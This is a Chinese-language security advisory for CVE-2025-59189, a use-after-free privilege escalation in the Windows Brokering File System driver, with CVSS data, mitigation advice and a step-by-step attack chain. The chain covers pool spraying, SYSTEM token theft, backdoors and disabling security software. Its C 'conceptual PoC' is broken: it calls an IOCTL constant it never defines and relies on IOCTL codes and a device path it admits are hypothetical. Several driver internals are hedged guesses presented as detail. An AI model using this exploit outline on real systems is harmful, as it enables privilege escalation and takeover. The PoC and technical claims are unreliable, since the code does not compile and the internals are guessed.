CVE-2025-59189 Microsoft Brokering File System UAF权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-59189

漏洞类型

Use-After-Free（释放后使用）/ 本地权限提升

CVSS评分

7.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Brokering File System（Windows操作系统组件）

漏洞概述

CVE-2025-59189是微软Brokering File System（Brokering文件系统，简称BrokFS）组件中存在的一个高危Use-After-Free（释放后使用，简称UAF）漏洞，于2025年10月14日由微软安全团队（[email protected]）披露并修复。该漏洞的CVSS 3.1评分为7.4分，严重等级为HIGH。其CVSS向量为CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H，表明该漏洞的攻击向量为本地（AV:L），攻击复杂度为高（AC:H），无需权限（PR:N）和用户交互（UI:N），但在机密性、完整性和可用性方面均产生高影响。Brokering File System是Windows操作系统中用于支持Windows Subsystem for Linux（WSL）等跨平台文件操作的关键文件系统过滤驱动组件，负责桥接Windows NTFS文件系统与Linux文件系统之间的操作。该漏洞允许未经授权的攻击者在本地系统上提升权限，可能导致攻击者从普通用户权限提升至SYSTEM级别权限。由于该漏洞涉及Windows核心文件系统组件，影响范围覆盖多个Windows版本，对企业和个人用户的安全构成严重威胁。微软已在2025年10月的例行补丁星期二（Patch Tuesday）中发布了安全更新来修复该漏洞。

技术细节

该漏洞的核心原理是Microsoft Brokering File System驱动（通常为bfs.sys）在处理特定文件系统操作请求时，存在对象生命周期管理缺陷。具体而言，当驱动处理来自用户态的文件I/O请求（如创建、读取、写入或关闭文件句柄等操作）时，可能会在释放某个内核对象（如FSCTL请求上下文、文件对象或缓冲区结构体）后，仍然保留对该已释放内存区域的引用（指针）。当后续操作再次访问该引用时，就会触发Use-After-Free漏洞。由于Windows内核使用分页池（paged pool）或非分页池（non-paged pool）来分配这些对象，攻击者可以通过以下方式利用该漏洞：1）通过精心构造的IOCTL请求或文件系统操作触发UAF条件；2）利用Windows内核池喷射（pool spraying）技术，将受控数据写入被释放的内存区域；3）通过覆盖内核对象（如函数指针或回调函数）实现任意代码执行；4）最终将当前进程的权限提升至SYSTEM级别。由于攻击复杂度被标记为高（AC:H），攻击者需要深入了解Windows内核内存管理机制和Brokering File System的内部实现，并需要精确控制时序和内存布局才能成功利用该漏洞。值得注意的是，该漏洞无需用户交互即可触发，且无需任何前置权限，使得本地多用户环境（如共享终端、终端服务器）面临较大风险。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上拥有一个本地用户账户（即使是低权限账户）。该漏洞无需特殊权限即可触发，但需要攻击者具备Windows内核内存管理的专业知识，并准备好相应的利用工具链（如内核调试器、内存喷射工具等）。

STEP 2

步骤2：获取BFS驱动句柄

攻击者通过CreateFile API打开Brokering File System驱动的设备对象（\\Device\\BrokeringFileSystem或类似路径），获取与内核驱动通信的句柄，为后续发送IOCTL请求做准备。

STEP 3

步骤3：触发UAF条件

攻击者通过DeviceIoControl发送精心构造的IOCTL请求，利用Brokering File System驱动在处理特定文件系统操作时的对象生命周期管理缺陷，触发内核对象在释放后仍被引用的Use-After-Free条件。

STEP 4

步骤4：内核内存操控

利用Windows内核池分配机制（pool allocation），通过多次分配和释放操作（heap spraying/feng shui），将受控数据写入被释放的内核对象所在的内存区域，实现对内核对象（如函数指针、回调函数表）的劫持。

STEP 5

步骤5：权限提升

当被劫持的内核对象被系统调用时，执行攻击者控制的代码，将当前进程的访问令牌（Access Token）替换为SYSTEM令牌的副本，或直接调用Windows API将当前线程提升至SYSTEM权限级别。

STEP 6

步骤6：持久化与影响扩大

获得SYSTEM权限后，攻击者可以安装后门、修改系统配置、窃取敏感数据、禁用安全软件、创建隐藏账户等，实现对目标系统的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-59189 - Microsoft Brokering File System Use-After-Free PoC (Conceptual)
// WARNING: This is a conceptual PoC for educational and research purposes only.
// Exploiting this vulnerability without authorization is illegal.

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>
#include <stdlib.h>

// Brokering File System device name
#define BFS_DEVICE_PATH "\\\\.\\BrokeringFileSystem"

// Hypothetical IOCTL codes for Brokering File System operations
// Note: Actual IOCTL codes would need to be reverse-engineered from bfs.sys
#define IOCTL_BFS_OPEN_FILE     CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_BFS_READ_FILE     CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_BFS_CLOSE_FILE    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_BFS_QUERY_INFO    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)

typedef struct _BFS_REQUEST {
    ULONG   RequestId;
    ULONG   OperationType;
    ULONG   Flags;
    ULONG   DataSize;
    PVOID   DataBuffer;
    ULONG   Reserved[4];
} BFS_REQUEST, *PBFS_REQUEST;

// Step 1: Open handle to Brokering File System driver
HANDLE OpenBfsDevice() {
    HANDLE hDevice = CreateFileA(
        BFS_DEVICE_PATH,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open BFS device. Error: %lu\n", GetLastError());
        return INVALID_HANDLE_VALUE;
    }
    printf("[+] BFS device opened successfully. Handle: %p\n", hDevice);
    return hDevice;
}

// Step 2: Trigger the UAF condition via race condition
BOOL TriggerUAF(HANDLE hDevice) {
    BFS_REQUEST request = { 0 };
    request.RequestId = 1;
    request.OperationType = 0x01;  // Hypothetical operation
    request.Flags = 0x02;          // Flag that triggers the vulnerable code path
    request.DataSize = sizeof(BFS_REQUEST);
    request.DataBuffer = (PVOID)0x4141414141414141;

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_BFS_QUERY_FILE,
        &request, sizeof(request),
        &request, sizeof(request),
        &bytesReturned,
        NULL
    );
    printf("[*] Triggered UAF condition. Result: %d, Error: %lu\n", result, GetLastError());
    return result;
}

int main() {
    printf("[*] CVE-2025-59189 PoC - Microsoft Brokering File System UAF\n");
    printf("[*] For authorized security testing only.\n\n");

    HANDLE hDevice = OpenBfsDevice();
    if (hDevice == INVALID_HANDLE_VALUE) {
        return 1;
    }

    // Trigger the vulnerability
    TriggerUAF(hDevice);

    CloseHandle(hDevice);
    return 0;
}

影响范围

Windows 10 版本1809至22H2（32位和64位）

Windows 11 版本21H2至24H2（ARM64和x64）

Windows Server 2019

Windows Server 2022

Windows Server 2025

防御指南

临时缓解措施

在无法立即安装安全补丁的情况下，建议采取以下临时缓解措施：1）限制本地用户账户的权限，尽量使用标准用户账户进行日常操作，避免使用管理员账户登录；2）通过组策略（GPO）禁用或限制WSL功能的使用，因为Brokering File System主要服务于WSL与Windows文件系统之间的桥接操作；3）启用Windows Defender Attack Surface Reduction（ASR）规则，限制可疑的内核驱动调用行为；4）部署主机入侵检测系统（HIDS），监控异常的设备驱动访问和IOCTL调用；5）使用Microsoft Defender for Endpoint等高级威胁防护解决方案，检测潜在的权限提升攻击行为；6）对关键服务器实施网络隔离和访问控制，限制物理和远程访问权限；7）定期备份重要数据，以便在遭受攻击后能够快速恢复。